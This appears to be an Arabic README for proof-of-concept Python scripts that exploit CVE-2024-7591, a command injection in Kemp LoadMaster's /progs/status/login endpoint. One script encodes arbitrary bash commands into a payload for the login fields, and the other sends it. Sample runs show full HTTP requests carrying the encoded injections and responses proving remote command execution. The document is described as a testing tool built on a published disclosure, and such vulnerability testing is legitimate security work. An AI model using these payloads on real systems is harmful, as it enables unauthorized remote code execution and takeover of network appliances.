
تختبر نصوص بايثون PoC هذه جهاز Kemp LoadMaster للتحقق من ثغرة تنفيذ التعليمات البرمجية عن بُعد.
هذه السكريبتات البايثونية الخاصة بـ PoC تختبر Kemp LoadMaster للبحث عن تنفيذ التعليمات البرمجية عن بعد.
هذه الأداة مخصصة لأغراض الاختبار فقط
تعتمد هذه السكريبتات على مقالة ماريوس والتر حول تفاصيل هذه الثغرة. يمكنك قراءة منشورهم على: https://insinuator.net/2024/11/vulnerability-disclosure-command-injection-in-kemp-loadmaster-load-balancer-cve-2024-7591/
هذا هو سكريبت بايثون 3 مصمم لاختبار LoadMaster ضد CVE-2024-7591.
الاستخدام:
KempRCECommandGenerator.py مصمم لأخذ أمر باش وتحويله إلى صيغة مشفرة يمكن استخدامها لتشغيل أوامر عن بعد ضد LoadMaster ضعيف. ناتج هذا الكود مخصص للاستخدام مع Burp Suite أو أداة أخرى لإرسال الأوامر عن بعد إلى الخادم.
مثال:
$: python3 ./KempRCECommandGenerator.py
Enter your command: echo hello
Put this output in the token, token2, user, or pass field
in the POST request to /progs/status/login.
%01%78%27%3b%65%63%68%6f%20%68%65%6c%6c%6f%3b%65%63%68%6f%20%27%01
$:
يجب أن يكون ناتج أمرك موجودًا في الاستجابة بعد رؤوس HTTP وقبل كود HTML.
KempExploit.py هو سكريبت بايثون مستقل لاختبار ما إذا كانت الثغرة قابلة للاستغلال أو لتشغيل كود مخصص.
المتطلبات الأساسية:
requests
urllib3
bs4
textwrap
مثال:
$: python3 ./KempExploit.py -i 10.0.1.50 --verbose --secure
Enter your command to send or leave blank to test:
It looks like I found a target and some tokens. Do you want to proceed? [y/N]y
---------------- request ----------------
POST https://10.0.1.50:443/progs/status/login
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 196
token=d8a7863c4a3b59a56b42403cf9100435&token2=b1e63802eb144a814c00ffa8c870d3c6&logsub=Login&user=pwn&pass=%01%78%78%78%27%3b%65%63%68%6f%20%65%78%70%6c%6f%69%74%61%62%6c%65%3b%65%63%68%6f%20%27%01
---------------- response ----------------
200 OK https://10.0.1.50:443/progs/status/login
Date: Tue, 12 Aug 2025 00:55:32 GMT
Connection: Keep-Alive
Content-Type: text/html
Transfer-Encoding: chunked
exploitable
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Connection: close
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
<!DOCTYPE html>
<html>
<head>
<script>
alert("Login Failed");
</script>
<script>
if(parent && parent != window){
parent.location = "/";
parent.location.reload(true);
}
</script>
</head>
</html>
Login POST status code: 200
✅ 'exploitable' found in response, server confirmed vulnerable.
$:
مثال 2:
$: python3 ./KempExploit.py -i 10.0.1.50 --secure --verbose
Enter your command to send or leave blank to test: ping -c2 10.0.1.16
It looks like I found a target and some tokens. Do you want to proceed? [y/N]y
Running the command ping -c2 10.0.1.16
The encoded command looks like: %01%78%27%3b%70%69%6e%67%20%2d%63%32%20%31%30%2e%30%2e%31%2e%31%36%3b%65%63%68%6f%20%27%01
---------------- request ----------------
POST https://10.0.1.50:443/progs/status/login
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 196
token=a236deda9bb1d4930a331e92caf269ad&token2=a5a5587fd8babd690851f32a85faabb8&logsub=Login&user=pwn&pass=%01%78%27%3b%70%69%6e%67%20%2d%63%32%20%31%30%2e%30%2e%31%2e%31%36%3b%65%63%68%6f%20%27%01
---------------- response ----------------
200 OK https://10.0.1.50:443/progs/status/login
Date: Tue, 12 Aug 2025 00:59:08 GMT
Connection: Keep-Alive
Content-Type: text/html
Transfer-Encoding: chunked
PING 10.0.1.16 (10.0.1.16) 56(84) bytes of data.
64 bytes from 10.0.1.16: icmp_seq=1 ttl=63 time=6.71 ms
64 bytes from 10.0.1.16: icmp_seq=2 ttl=63 time=5.34 ms
--- 10.0.1.16 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 5.349/6.030/6.712/0.685 ms
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Connection: close
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
<!DOCTYPE html>
<html>
<head>
<script>
alert("Login Failed");
</script>
<script>
if(parent && parent != window){
parent.location = "/";
parent.location.reload(true);
}
</script>
</head>
</html>
Login POST status code: 200
Command sent successfully.
$: